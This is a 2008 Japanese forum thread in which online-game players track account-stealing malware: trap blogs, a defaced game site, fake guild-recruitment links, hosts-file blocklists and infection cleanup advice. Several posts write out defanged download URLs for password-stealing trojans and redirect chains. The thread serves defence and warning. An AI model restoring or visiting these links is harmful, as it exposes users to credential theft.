先のタイポ罠ブログは忍者運営から今メールが来て対処したとのこと。
メール送付から約1時間ほどで対処してくれた。

ウィキ巡回をしているとLivedoorwikiのROカードバトルWikiが改竄されたままになっていたので修正と、罠269gブログ通報.
言うまでもなく他人のFC2ブログ記事丸パクリ+teamerblogが仕込まれていた。

293 名前:(○口○*)さん:08/07/09 13:27 ID:9wCrbn7l0
>>289
前半はいつものパス抜き。
www■gamemmobbs■com/esports/ro2.exe
6月15日製造。約1ヶ月(ry
後半はwhoisにはある。ステータスがholdになってるけど。

294 名前:(○口○*)さん:08/07/09 13:43 ID:9wCrbn7l0
スカッとパンヤ
【重要】公式サイト改ざんに伴う皆様へのお願い
ttp://www.pangya.jp/board_notice_view.aspx?seq=1576

4Gamer
「スカッとゴルフ パンヤ」公式サイト改竄事件続報
ttp://www.4gamer.net/games/014/G001477/20080708039/
今回の事件では,土曜(7月5日)夜の時点で連絡が入ったとされており,
実際にメンテナンスが行われたのは月曜(7月7日)になってからである。
こういったものは土日のサポートが薄い時間を狙って仕掛けられることが多いのだが,
アカウント情報やゲーム内通貨などを扱っているサイトであれば,
事実確認を最優先することは当然のことである。
ウイルス検出ソフトで反応したURLが通知されていたのなら,
ページソースをざっと眺める,ないし,ウイルス検出ソフトをインストールしたPCで
同ページを開くだけでも確認できたはずだ。
1日半の「事実上の放置」(調査中だったとされているが)は大きな問題といえるだろう。
現在では,オンラインゲームの大手となったゲームポットにしては,
杜撰な対応ではないだろうか。

295 名前:(○口○*)さん:08/07/09 13:44 ID:9wCrbn7l0
なんだよ「スカッとパンヤ」って…「スカッとゴルフ パンヤ」だった。

296 名前:(○口○*)さん:08/07/09 13:58 ID:VP51IgiY0
パンヤがスカッたのですね。わかります。

>オンラインゲームの大手となったゲームポット
親会社のソネットも同上ってことで。

297 名前:(○口○*)さん:08/07/09 14:20 ID:VP51IgiY0
ふと思い出したんだけれど、みんなWindows Defender は入れてる?
システムの変更を監視してくれるので、有効に使うには多少の知識が
必要とはいえ役に立つと思うんだけれどね。
何かあったとき教えてくれるし、操作を許可するか拒否するか選べる。

298 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/09 19:07 ID:/VaBuc4i0
Proの一時作成ファイルにも反応することがあったり、
何かソフトをインストールした時や
手動でhosts変更を加えた時にきっちり反応してくれます。
わからない動作のものに関しては一度拒否した後で
それが何か調べてから対処したり出来ますので心持安心感が。

フルスキャンとクイックスキャンがありますけど、
自分の環境だとバスターと比べてクイックは5分もかからず、
フルだとカスペとバスターとも同じ位の時間ぐらいですが
ファイル数だけ比較してもこれもほぼ同数。

WindowsDefenderは別窓作業しながらでも体感早かったのは
圧縮ファイルの検索深度が低いからなのかどうなのか判りませんが
他のと比べると軽い印象があります。 

と簡単な使い勝手ですが報告までー。

299 名前:(○口○*)さん:08/07/09 19:44 ID:r+c5cT2U0
今日当たったパッチ、実はとんでもない脆弱性の対策を
含んでいたって話。
http://www.afpbb.com/article/environment-science-it/it/2415865/3112275

DNSに絡むものらしいけれど、全ての人に影響があるとか。
技術的な詳細は1ヶ月間明かされず、パッチもリバースエンジニアリングが
できないよう施しがしてあるらしい。

300 名前:(○口○*)さん:08/07/09 20:14 ID:z6X69Vml0
Windowsの脆弱性ではなく"インターネットの脆弱性"なのかー

301 名前:(○口○*)さん:08/07/09 20:44 ID:9wCrbn7l0
DNSはWindowsに限った話じゃなく、最大手のISC BINDとかもだしねぇ。
サーバ管理者がゲンナリしていると思われ。

302 名前:(○口○*)さん:08/07/09 21:05 ID:r+c5cT2U0
BIND9のパッチ公開、DNSキャッシュポイズニング攻撃に対処
http://www.itmedia.co.jp/enterprise/articles/0807/09/news026.html

前からDNSは脆弱性が指摘されていたけれど、それが現実になって
しまったってことで、機会を見てDNSSECが全体的に導入されるといいがな。

303 名前:(○口○*)さん:08/07/09 22:49 ID:xWnCq8mp0
インターネット自体が、そもそも性善説によって成り立つシステムとして設計されているからな

304 名前:(○口○*)さん:08/07/10 01:09 ID:idEspQlY0
規模こそ拡大したけど、まだ随所にUUCP時代の名残が残っている訳で。当時はnetnewsトラフィックが主流だったけど。
sendmailはqmailやpostfixに置き換えられる事例が増えたけど、POP3は依然としてAPOPやIMAPへの移行が進まないし。
もっともこっちは、WebMailが主流になることでPOP3が使われなくなる方が早そうだが。
SenderID/SPF&DomainKeysはようやく浸透しつつあるものの。

305 名前:(○口○*)さん:08/07/10 01:54 ID:iens2h4n0
httpが平文で流れているのはともかく、他のプロトコルは公開鍵方式で
暗号化だけでなく成りすましも防止しないと危ないよなあ。
DNSで曲げられちゃうと。

306 名前:(○口○*)さん:08/07/10 03:48 ID:5JMvRq5k0
【      気付いた日時          】 7/9 朝
【不審なアドレスのクリックの有無 】Yes>http//ime.nu/www■makgcat■com/woodem.htm
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes
【     OS    】 2000 SP4
【使用ブラウザ 】 IE7
【WindowsUpdateの有無】 かなり前に自動更新
【 アンチウイルスソフト 】 マカフィー・インターネットセキュリティスイート
【 ウイルススキャン結果】
マカフィーにてスキャン 異常なし
カスペルスキートライアル版にてスキャン 異常なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】 無
【PeerGuardian2導入】無
【説明】
GM募集を装った垢ハクURL。踏むとカラの白いページのサイトに飛ばされ、
マカフィーがトロイの木馬であることを報告。同時に怪しいファイルを
速攻排除した旨もアナウンス。
当方2PC環境ではあるのだが、同じ回線よりルーター分岐させ、かつピア2ピア
で繋いだ状態。感染していないPCからパスを変えても問題ないでしょうか?
感染PCのほうで公式サイトを閲覧するとまずいのでしょうか?
ROにはいっさいログインしておりませんが、万全を期すならば
OS再インストールでしょうか。

307 名前:(○口○*)さん:08/07/10 07:56 ID:5lFe6ffA0
>306
踏んでない方のPC → PASS変更は問題無し
踏んだ方のPC → (万全を期するなら)HDDフォーマットの上OS再インストール

308 名前:(○口○*)さん:08/07/10 08:48 ID:AEbBXqnC0
感染PCでの公式サイト閲覧自体は問題無いが、IDとパスを利用するページ(クッキー保存のものも含む)は危険。
本来、なにか踏んだら、即刻LANケーブル引っこ抜けという位の扱いが望ましい。

安全な環境にするのが最優先。それ以外の作業(Webページ閲覧など)は、後回しにしなさい。

309 名前:(○口○*)さん:08/07/10 11:23 ID:FtN8jYMv0
福建中華の罠ブログ、7月9日作成。
記事はどっかのROブログから丸パクリ。
blog■livedoor■jp/cvooe/

game689と閉店セール状態のmakgcatの実行ファイルリンクが貼られている。

cvooeと言う名前でyh33ddd同様、XREAを初め、あちこちのコミュニティに潜入している。
Googleでcvooeを検索すると5000件超ヒット。

リンクが実行ファイルなあたり、今回の罠ブログはよほど慌てて作ったかな。

しかしライブドアは通報してもなぁ、機械返答&規約に罰則が無いので対処しませんで終わりそうだな。
忍者の1時間で対処とは偉い違いだ。
ライブドアブログはahirun1,yh33ddd,cvooeと着実に拠点化が進むのだった。

ともあれ気をつけてくれよな!

310 名前:(○口○*)さん:08/07/10 11:29 ID:lBkIvswJ0
>>306
>【     OS    】 2000 SP4
>【使用ブラウザ 】 IE7
XPなのかIE6なのかきっちりしてくれ。

主要なアカハックマルウェアは、LANの中で自己増殖するものは希少、というかほぼ皆無。
よって、まずは感染PCを清浄化することが最重要。感染後にID/passの入力を伴わなければ、原則盗むようがない。
windows2000なのであれば、OS再インストールついでにIE系以外のブラウザ導入も検討すると良いかも。IE7の提供はされないので。
別PCの方は、念の為にカスペ(オンライン版で可)でフルスキャンを掛けておくのが良いかと思われ。

311 名前:306:08/07/10 13:31 ID:5JMvRq5k0
すみません以下の情報誤りでした。
>【     OS    】 2000 SP4
>【使用ブラウザ 】 IE7

正しくは、
【     OS    】 win2000 SP4
【使用ブラウザ 】 IE6
でした。

>307
>308
>310
アドバイス感謝いたします。
ひとまずはOS再インストいたします。

312 名前:(○口○*)さん:08/07/10 16:26 ID:CwJuRyzH0
質問を2つ。

1.レジストリを自身のPC以外から編集する方法ってありますか?

先日、知り合いにPC(バスター2008使用)のウィルス駆除の依頼を受けたが
全然PCが起動せず、別PCにHDDをぶら下げて、そこからカスペの体験版で
駆除を実施。

しかしレジストリが改竄されてるのか、ウィルスを駆除してもHDDを戻しても
起動しない。
仕方なく、全データを別のPCにコピーして、OS再インストール。

作業しつつ、他PCからぶら下げたHDD内のレジストリが操作できれば
もう少し楽に復旧出来たのかも、とか思った次第。


2.Linix系のアンチウィルスソフトって無償で検出力の高いものってありますか?

上記作業のときに、LinuxのLiveCDで起動してHDDチェックする方法を
思いついたものの、アンチウィルスソフトに何を使えば分からず使用諦め。

そのあたりが低容量で収めれるなら、名刺サイズのCDRに焼いて持ち歩いてたら
何かと便利かも?とか思った次第。


上記二点、何かご存じの方いませんか?

313 名前:(○口○*)さん:08/07/10 16:45 ID:zucQ7csD0
根本から覆すような回答ですが

>>312
1.
>ウィルスを駆除してもHDDを戻しても起動しない。
それは「復旧を諦めるポイント」だと思います。
せいぜい、OSの修復インストールを試みるくらいでしょうか。

2.
パターンが日々更新されるのにCD-Rに焼くのはナンセンス。
OSが生きている前提で、とりあえずこういうのを使ってみるとか。

ウイルス検出・駆除用無料ツール Dr.Web CureIt!
http://drweb.jp/support/cureit

BitDefender8を使う。
アップデートファイルが↓にあるのでこれで更新して使う。
http://www.bitdefender.com/site/view/Desktop-Products-Updates.html

ノーパソと、HDDをUSB接続できるケーブルを持って出かけるのが
楽そうですけれどねー。

314 名前:(○口○*)さん:08/07/10 16:46 ID:zucQ7csD0
追記。回答のために参考にしたQ&Aです。

オフラインでウイルス診断ができるか?
http://okwave.jp/qa2967587.html

315 名前:(○口○*)さん:08/07/10 16:49 ID:LUA3+AWU0
regedit
ファイル→ネットワークレジストリへの接続
ネットワークドライブ等と同様に権限の確認が行われるので
起動しなきゃだめだけどね。
DBの構造としてはJetらしいので直接いじることもできるかもしれんけど
たぶんクリーンインストールしたほうが早い。

Linuxは2CHのLinux板とかで聞いたほうがいいんじゃね?
ここはあくまでROの板。Windows以外はさすがに管轄外。

316 名前:(○口○*)さん:08/07/10 17:06 ID:QH1ZEd2BO
レジストリを直しても他が壊れてたら起動しないから
サルベージしてクリーンインストールおすすめ

317 名前:(○口○*)さん:08/07/10 17:47 ID:FtN8jYMv0
>>312
>2.Linix系のアンチウィルスソフトって無償で検出力の高いものってありますか?
俺はWindows2000/openSUSEのデュアルブート環境でPCを使っているのでなるたけ同じアプリ、と言う意味で
両者にAntivir入れてる。
SUSEではOSインストール時にパッケージの選択でチェックを入れればインストール出来る。
もちろんOSインストール後も可能だけどね。

318 名前:(○口○*)さん:08/07/10 18:17 ID:LUA3+AWU0
今日拾った新型。
ttp://www.virustotal.com/analisis/88dd48ae6dbc27ed561a87ee04ca1ad6
ttp://blog-imgs-21.fc2.com/i/l/i/ilion/2008070704.png
FC2 livedoor Yahoo! WindowsLive yaplog! YouTube mixi ニコニコ動画
万が一これらのIDやパスワードがROと同じならそのまま使えてラッキー、
そうじゃなくても(たぶんこっちが本命だけど)なりすまして罠ばら撒き。
スルー組(avast AVG McAfee Microsoft NOD32 Norton バスター)には提出済み。

319 名前:312:08/07/10 19:48 ID:CwJuRyzH0
レジストリを外部からは無理ですか
少なくとも RUN の部分だけでも修正出来れば多少マシになるかな、とか
思ったんですが。


Linixの方は、単純にLiveCDやUSBメモリ起動のLinux環境を持ち歩けたら
ハク時でも安全な環境からのPass変更が出来るし、それに加えてウィルスの
駆除も出来たら便利かな、と思った次第。
DHCPで大抵ネットに繋げれるから、最新のパターンファイルはDL出来るし
緊急時の環境という意味では悪くないかな、と。

320 名前:(○口○*)さん:08/07/11 01:05 ID:dUdXv98L0
>>312
HKLM選択状態で、[ハイブの読み込み]で該当HDDのsystem.regをインポート。
必要な部分の編集が終わったら、[ハイブのアンロード]で反映。
これで出来ないかな。

Linuxでのアンチウイルスソフトは、ClamAVの名前が良く出てくるような気がします。

321 名前:(○口○*)さん:08/07/11 04:30 ID:2BxL5X790
広告でのハッキングは今のところXREAだけという認識でok?
atWiki閲覧中にPCが何か裏で動いてたっぽかったもんで気になった

とここまで書いて気づく、どうやらMcAfee様が更新を確かめに行っただけだったみたいだ

322 名前:(○口○*)さん:08/07/11 09:10 ID:Gsap/d3a0
ok?て言われてもだれもそれを保証できないわ。
世間的な認知、という程度ならそれでいいけれどね。

323 名前:(○口○*)さん:08/07/11 09:56 ID:j4Djs5RM0
>319
USBメモリ起動のLinuxはLiveCDと違ってポケットに入るし便利。

以前はLiveCDなり使って、一度Linuxを起動してからUSBメモリに
インストールする必要があったが、liveusb-creator というソフトなら
Win上から直接USBメモリにLinux(Fedora)をインストール出来る。
ttps://fedorahosted.org/liveusb-creator

また最初からインストール済みのUSBメモリも販売されてるのもある。
ttp://pc.watch.impress.co.jp/docs/2008/0612/cramworks.htm

最近はUSBメモリも安いし、緊急用のLiveCDの代わりにUSBメモリは
結構良いと思う。
Biosが対応してる必要はあるけどね。


>321
>248 もそうなんじゃないのか?
ffxiahってのが、どこにあるどんなサイトなのか知らんけど。

324 名前:(○口○*)さん:08/07/11 10:32 ID:1mNG+TZm0
FFXIには競売所というシステムがあって(露店放置する必要がない)、
それの取引状況を表示する非公式サイト。

325 名前:(○口○*)さん:08/07/11 10:44 ID:2BxL5X790
>>322
今現在、他に例があがっているのかを知りたかったんだ。
ともあれサンコス。

326 名前:(○口○*)さん:08/07/11 14:55 ID:Q0NR2iX+0
ちょっと質問です。
先ほど久しぶりにメールチェックをしたら、AGVのメールスキャンでトロイを5つほど検知したのですが・・・
即削除、メールも開けずに削除して、その後に全PCスキャンもして発見されませんでした。
メールソフトはOutlookです。
ウィルス対策ソフトはAVG Anti-Virus Free Edition8.0です。

ひとまず安心していいものでしょうか?

327 名前:(○口○*)さん:08/07/11 15:03 ID:Gsap/d3a0
>>326
メールスキャンで検出・削除ならそのままで問題ないかと。
心配なら、カスペのオンラインスキャンでもかけておいたら?

328 名前:326:08/07/11 16:29 ID:Q0NR2iX+0
心配だったのでカスペルスキーのオンラインスキャンしてきました。
特に何も見つからず一安心です。

AVG導入して以来、メールスキャンで初めて検知されて焦った次第です。

とにかく、ありがとうございました。

329 名前:(○口○*)さん:08/07/11 17:23 ID:CxaANRLW0
AVGって18禁体験版DL直後は反応しなかったのに
しばらくしてからウイルス入っているとかいうから
信用していいものか悩んでいるお

330 名前:(○口○*)さん:08/07/11 19:50 ID:9B3yfYoL0
>>329
それパターン更新で対応して、定期スキャンかけなかったから
ファイルに触るまで放置されていただけでしょ

331 名前:(○口○*)さん:08/07/11 21:38 ID:IprCZOaT0
>>329のPCは、目出度くエロ禁PCとなりました。

332 名前:(○口○*)さん:08/07/13 01:57 ID:ZmsZ2/L20
エキサイトブログに作られた罠ブログ、
ffxijod■exblog■jp

いつもの手口、他人のブログ記事をパクったもの。
kovieという名でこれまたあちこち潜入している模様である。

罠ブログにはIMGタグトラップもあるので注意。
それ以外にも新手の罠があるようだ、”それはリンクを閉じない”。
最新記事の中の"FF11動画"と言う部分にjplineageの実行ファイルへのリンクがあるが。
ソースを見ると実行ファイルのリンクには</a>がない。
つまり、その記事中のリンクより下がすべてウィルス実行ファイルへのリンクになってしまうのだ!
記事内限定であるから危険な記事をスクロールアウトするなりすれば回避できる。
Comment欄から
コメントを入れてみたが、コメント文もウィルス実行ファイルへのリンクに!

何せコメントのフォームの中でマウスクリックしてもこれをDLしようとするからうっかりクリックも出来ない。
知らない奴が訪問ありがとうとコメント入れようものなら即時にダウンロードダイアログがでるだろう。
実行ファイルじゃなくていつものステルスIFRAMEとかだったらと思うとゾッとするわ。

とりあえずはエキサイトに通報済み。
気をつけてくれよな!

333 名前:(○口○*)さん:08/07/13 02:29 ID:GTF/mkfJ0
ブロック要素をまたげないのか次のaタグで止まるのか、
全部リンクにはならないね(「強さは計り知れない」の手前で止まっちゃってる)。

334 名前:(○口○*)さん:08/07/13 03:57 ID:1D2IVu8y0
本来の仕様だとAタグはブロック要素を含められないからね
たぶんブラウザに依存するんだろうな

335 名前:(○口○*)さん:08/07/13 05:32 ID:upc6Qxss0
Gecko系だときっちり解釈するので、コメントフォームの記述部分までA要素が波及しているね。
IEだと、手前のトラックバックリンクのA閉じで、閉じ忘れの要素まで断ち切られている。駄目実装に結果的に救われた感じが。

もっとも、exblog自体が広告にiframe使いまくりのin-Valid設計で気持ち悪いけど。

336 名前:(○口○*)さん:08/07/13 05:51 ID:5lh+W9lW0
>>335
invalidとin valid(って普通は書かないけど)は意味逆だよ。

337 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/13 07:59 ID:28DGsUIv0
申し訳ないことに恥ずかしながら
先日追加したリスト部分で追加した更新日付部分"08/07/13/0121版"に
コメント行"#"を追加し忘れていました。
現在は修正しております。

ここで初心者的な質問なのですが、
アコプリWikiさんのhostsRenewScriptを使用時に
リスト側でこういったミスを起こしていた場合は
どのように動作処理するのでしょうか?
正しいリスト表記では無いので、
そこで処理終了となっていればいいのですが…。

もしスクリプト利用の方がいらっしゃったら教えていただければ幸いです。

338 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/13 08:02 ID:28DGsUIv0
・補足説明
#コメント行
127.0.0.1 ドメイン名

コメント行
127.0.0.1 ドメイン名
こんな感じのミスをしてました。

339 名前:(○口○*)さん:08/07/13 08:13 ID:sY4q1I3K0
127.0.0.1 ドメイン名 のスペース以後のみをドメイン名とみなすので
コメントにスペースやタブが含まれない場合は無視されます。

"08/07/13/0121版" → その行は無視。
"08/07/13 0121版" → "127.0.0.1 0121版" として記録される。

残念ながら終了にはなりませんね。

340 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/13 08:35 ID:28DGsUIv0
>>339

#コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
#コメント行
127.0.0.1 ドメイン名
だと

#コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
127.0.0.1 コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
#コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
という感じで処理されているということですか。

スクリプトのほうの初期設定では
リストは常に新規作成と言う事みたいなので
その場合はコメント行のミスは無かったことになるのですけど、
追記モードONの人で追記時の条件127.0.0.1を追加しない人は
誤動作起こしているかもとか…?

いやはやとにかく失礼しました。
出来る限りミスは避けたいところなのですが
スクリプト使用の方々はこちらのミスで
変なことになってないか手持ちのhostsリストを確認していただけたら幸いです。

341 名前:(○口○*)さん:08/07/13 09:58 ID:cXLIGBaI0
>340
PC2台、タスクで日に4回処理させてるが、変なのは無かった。
確認したのは作成時間が
1台目:今日の00:30・06:30
2台目:今日の02:00・08:00
の計4つ(バックアップ含む)で、127.0.0.1を付加する設定。


127.0.0.1を付加する設定(初期設定)ならスペースが入ってても書式的に
問題ないから、誤動作はしないはず。
127.0.0.1を付加しない設定に変更してる人は、変な行が出来てて
誤動作する可能性もある。

でも、わざわざここの設定を変える意味がない(※)し、今回のケースは
結果的に問題は無かったと思われる。

※127.0.0.1を付加しない設定=元リストの内容をそのまま書く、という意味。
 でもそれだと元リストが改竄される等で罠IPが入ったリストを読み込んだ
 場合が危険。
 だから当初からscript側で付加するのが初期値になってる。

何はともあれ、深夜と朝と2回の更新、お疲れ様です。

342 名前:(○口○*)さん:08/07/13 12:41 ID:/fqB52ZU0
先程見つけた中華サイトへの招待状
ギルド&キャラ名は伏字

>1 名前:774回デスペナな魔術師さん[] 投稿日:2008/07/13(日) 11:40:22
>Sara鯖で活動している『●●●●』というギルドです。
>HPを作成しましたので、来訪者歓迎です^^
>GMも募集してますので、よろしくですヽ(゚∀゚)ノ
>お気に召しましたら『▲▲▲▲』か『▼▼▼▼』までWisお願いします♪
>※もしくはBBSへの書込みでもOKです♪
>【以下URL】
>http://www■game689■com/jpro■htm/
>
>※※【BBSへの書込みについて】※※
>中傷的な内容や、悪質なリンクは固くお断りしておりますので
>ご理解とご協力お願い申し上げます。

343 名前:(○口○*)さん:08/07/13 13:05 ID:GTF/mkfJ0
>>342
2年前のドメインで今月26日にexpireになるので最後っ屁。
…のつもりがURIの最後に「/」付いてるので
ディレクトリ扱いで404 not foundで残念なことに。
どうも爆撃部隊の教育がなっとらんな。

www■game689■com/dd.exe
2008-06-30 18:10
Dr.WEB Trojan.PWS.Gamania.9824 感染後は Trojan.PWS.Gamania.origin
KasperskyTrojan-PSW.Win32.Mapler.ae 感染後は Trojan-PSW.Win32.Mapler.ao

344 名前:(○口○*)さん:08/07/13 13:15 ID:dire3vpq0
>>342
jpro.htmからdd.exeを呼び出し。カスペは全機撃墜。

ttp://www■game689■com/jpro■htm
ttp://www■game689■com/dd■exe

同じドメインの中にこんなファイルもある模様

ttp://www■game689■com/rmvb■exe
ttp://www■game689■com/vbshokmm/ff11■exe
ttp://www■game689■com/vbshokmm/t1■exe
ttp://www■game689■com/vbshokmm/ie■exe
ttp://www■game689■com/vbshokmm/ro■exe

jpro.htm : Trojan-Downloader.Win32.Agent.bzy
dd.exe : Trojan-PSW.Win32.Mapler.ae

rmvb.exe : Trojan-PSW.Win32.Mapler.ae
ff11.exe : Trojan-PSW.Win32.Mapler.ae
t1.exe : Trojan-PSW.Win32.OnLineGames.lbb
ie.exe : not-a-virus:AdWare.Win32.BHO.cd
ro.exe : Trojan.Win32.Inject.qt

345 名前:(○口○*)さん:08/07/14 15:38 ID:IRhV5Sud0
RAGUくえり情報抜取:皆様の個人的アカウントID情報を取得しました
RAGUくえり情報抜取:ご協力感謝します
RAGUくえり情報抜取:またのご協力お願いします
RAGUくえり情報抜取:ご質問・苦情などは RAGU■web■netにお願いします

露店をしていたら、これが流れたのですが、ハックとかなのでしょうか?
大勢の方が、露店をしているので、不安になり書き込みさせていただきました。

346 名前:(○口○*)さん:08/07/14 15:48 ID:qQBBXNev0
>>345
それこっちでも流れた
怪しいから踏んでないけど・・

347 名前:(○口○*)さん:08/07/14 15:56 ID:iUdqC3r90
狼鯖首都でも流れてたな。
新手の垢ハックかもしれんのでID抜き不正ツール使用で通報しといた。

348 名前:(○口○*)さん:08/07/14 15:58 ID:CfhSYNpJ0
RAGUくえりはこれ。危険URLではないが■つけとく。
http://robot■maturi■org/test/

運営状況を監視するために規約違反しているようだが、
その是非はスレ違いなので書かないでくれ。

その発言自体は、対抗勢力がやってそうな雰囲気だが。

349 名前:(○口○*)さん:08/07/14 15:59 ID:ipdCLrhR0
どう見てもキャラクエ

350 名前:(○口○*)さん:08/07/14 16:00 ID:+obmqKDJ0
名前から察するにきゃらくえ情報を収集してるんだろう
律儀に「収集しました」って報告する奴は初めて聞いたけどw

351 名前:(○口○*)さん:08/07/14 16:02 ID:f/3Mtrh50
現時点では RAGU■web■net というホストは存在していない様だ
但し、RAGUweb■net というホストは存在する

352 名前:(○口○*)さん:08/07/14 16:26 ID:qQBBXNev0
http://RAGU■web■net
こっちはなんだろね

353 名前:(○口○*)さん:08/07/14 16:57 ID:YYqEf7fA0
16:50ころにBijou鯖でも流れた

354 名前:(○口○*)さん:08/07/14 17:07 ID:oGwoc1mIO
今度はこっちに湧いたか…

BOT状況観察スレから追い出されたあらしだと思われるので
RAGweb関連はスルーの方向で

355 名前:(○口○*)さん:08/07/14 17:14 ID:NrjfyAmU0
「IDを抽出しました」に反応せざるを得ない部分ではあるからな
ただ、ログインIDのことではないと思われるので、ここで扱うのは無意味
よって>>354

356 名前:(○口○*)さん:08/07/14 17:15 ID:O0jUBkDX0
一応URLは踏まないようにと警告しておいたらいいんじゃない?無害でも怪しい物として

357 名前:(○口○*)さん:08/07/14 18:19 ID:BtFC6YzH0
>>356
怪しくもなんともないし、危険でもなんでも無い。警告する必要はかけらもない。

ゲーム内の棄て垢キャラの発言が気になって来た人に対しては、安全なので心配しないようにというのが結論。

358 名前:(○口○*)さん:08/07/14 18:36 ID:pX7LRAhj0
ホムでID調べました
で逃げられるんとちゃう?

359 名前:(○口○*)さん:08/07/14 18:37 ID:ifvuynd00
>>357
×安全なので
○危険というわけではないので

360 名前:(○口○*)さん:08/07/14 18:37 ID:NrjfyAmU0
PCにとってじゃなく精神的に「怪しい」ともいえるな
とにかく見に来させて、サイトの存在を認識してもらうと
BOT対策スレなどでもそうだったが、、とにかくサイトの存在自体をアピールしたいという意志が窺える
ゴシップものは何であれ気になるものだしね

ということで売名行為乙でスルーが一番

361 名前:(○口○*)さん:08/07/14 20:00 ID:iUdqC3r90
ほんとにホムでID抜いてるのか?
この発言してた奴はノビで、画面内に他ケミ&ホムなんていなかったと思うが?

362 名前:(○口○*)さん:08/07/14 20:11 ID:OtC6jtGx0
>361
ホムでやってようがツール使ってようが、どっちにしろスレ違い
気になるなら本人に聞けばいい

363 名前:(○口○*)さん:08/07/14 21:28 ID:BBs4RD8r0
RAGUの売名とみせかけて、アンチRAGUの嫌がらせだったようだ
(アンチRAGU=キャラ情報収集されると困るミジンコboter)


すれ違い乙

364 名前:(○口○*)さん:08/07/14 22:00 ID:zREUIKC50
中華の罠ライブドアWikiと罠ヤフーブログ。
どっちもIDはyty3le、tinyurlでも使ってたよな。
wiki■livedoor■jp/yty3le (ライブドアの罠Wiki、下のブログへのリンクあり)

blogs■yahoo■co■jp/yty3le (コメントでの感染狙い、初期コメントに罠FC2へのリンク(消滅済み))

後者はWikipediaの日本の女優の記事?パクリで相手を信用させ、コメントリンクで感染を狙ったもの。
先のyh33dddのように福建中華はIDを共通化させる傾向が強い。
ヤフーブログにはhutou(ピンインで口座)シリーズだけでもこれだけあった。(何れも削除済み)
hutouyy88 hutou2541 hutou224510 hutou332211 hutou55321 hutou558963

ブログや掲示板持ちは禁止語句に”hutou”なり”/hutou”とでもしておけばよいかも。
ともあれ気をつけてくれよな!

365 名前:(○口○*)さん:08/07/15 04:10 ID:V2QJo8aw0
Lydia板に書き込まれていたものです

www■voiceblog■jp/rakushushus
 →www■teamerblog■com/blog/
  →www■panslog■net/wiki/index1.htm
   →www■teamerblog■com/wiki/cer.exe  ←ウィルス
  →www■panslog■net/wiki/0733.htm
  →www■panslog■net/wiki/flash.htm
  →www■panslog■net/wiki/real11.htm

www■voiceblog■jpもインラインフレームが使用可能な為
サイズ0ので作成し、外部ページを呼び出しているようです

366 名前:(○口○*)さん:08/07/15 06:12 ID:yyj4on2A0
そういえば、GungHo-IDに@がついている人は一度限りだけれど
IDの変更ができるよ(来年3月まで)。

367 名前:(○口○*)さん:08/07/15 07:15 ID:UdP0vmSn0
>>365
初めて聞くブログだなぁ。通報済み?

368 名前:(○口○*)さん:08/07/15 08:35 ID:pdjVWTkx0
>>367
>>63-64で既出。つか、まだ凍結されていなかったのか。
いまどきDTD指定もされていないレンタルBlogだし、過度の期待は出来そうも無いが。

369 名前:(○口○*)さん:08/07/15 11:32 ID:LSIvlcMy0
福建中華がここ数日ポツポツとドメイン取得を行っている模様。
Domain name: gaimima130■com

Registrant Contact:
lin ying wu
yingwu lin
fu jian sheng long yan shi
long yan FJ 364000
cn

Created: 2008-07-13
Expires: 2009-07-13


Domain name: livedoorm■com

Created: 2008-07-12
Expires: 2009-07-12

気をつけてくれよな!

370 名前:(○口○*)さん:08/07/15 12:09 ID:hfFxyVMr0
livedoormってtypo狙いか
旧ライブドアマーケティングかと思った

371 名前:(○口○*)さん:08/07/15 13:21 ID:j2EX1+oX0
類似名のドメインに対して、Googleの「もしかして」みたいなチェック機能が
あればなぁ。

372 名前:(○口○*)さん:08/07/15 19:05 ID:hWj2NXvn0
>>371
typoに対しては、Firefox3のスマートロケーションバーが
そんな感じに働いてくれる。
インクリメンタルサーチだから補正とはちょっと違うけど。
http://mozilla.jp/firefox/features/#location-bar

373 名前:(○口○*)さん:08/07/15 22:47 ID:gs9xqOyc0
【      気付いた日時          】 昨日
【不審なアドレスのクリックの有無 】 無し
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 ウィンドウズXP
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 無
【 アンチウイルスソフト 】 avast spybot
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 avastで発見したウィルスは削除したのですがカスペにて再検出
【スレログやテンプレを読んだか】 今から読みます
【hosts変更】無 
【PeerGuardian2導入】無

昨日INすると自キャラの所持金が減っており垢ハクであることに気づきました。
とりあえず別のPCにてパスなどは変更したので大丈夫かとは思います
その後の対処として上記の通りavastや他のスキャンソフトで見つかった分の削除はしたのですが、
不安になりカスペでもチェックしたところ、
SYSTEM32のフォルダのSAMaspnet.dllというデータが感染しているということがわかりました。
さらにこのデータをavastでチェックしましたが検出されませんでした。
カスペでのスキャン結果によると、ウィルスの名前は「Backdoor.Win32.Delf.jga」
というものらしく対処に悩んでいます。
この場合どうすればいのでしょうか?よろしくおねがいします。

374 名前:(○口○*)さん:08/07/15 22:52 ID:iX1jVnkQ0
誤検出の可能性のあると思われるものはVirusTotal辺りに提出して自己判断。
カスペの検体提出窓口に出すのが一番確実。

ガンホーへの連絡と警察への届け出を平行して行ない、感染を除去したログ等の保存も忘れずに。

375 名前:(○口○*)さん:08/07/15 23:23 ID:gs9xqOyc0
>>374
レスありがとうございます
カスペの検体提出窓口というのはオンライスキャン結果の送信という項目でいいのでしょうか
あと、この書き込みは感染の疑いのあるPCで書き込んでいるのですが
ガンホーへの連絡などは別のPCのほうがいいですよね?

376 名前:(○口○*)さん:08/07/15 23:34 ID:iX1jVnkQ0
>>375
>カスペの検体提出窓口というのはオンライスキャン結果の送信という項目でいいのでしょうか
セキュWikiの検体提出窓口を参照。

オンラインスキャンに送信ってあったっけかな。あればそこでもいいけど、メールで送っとけば
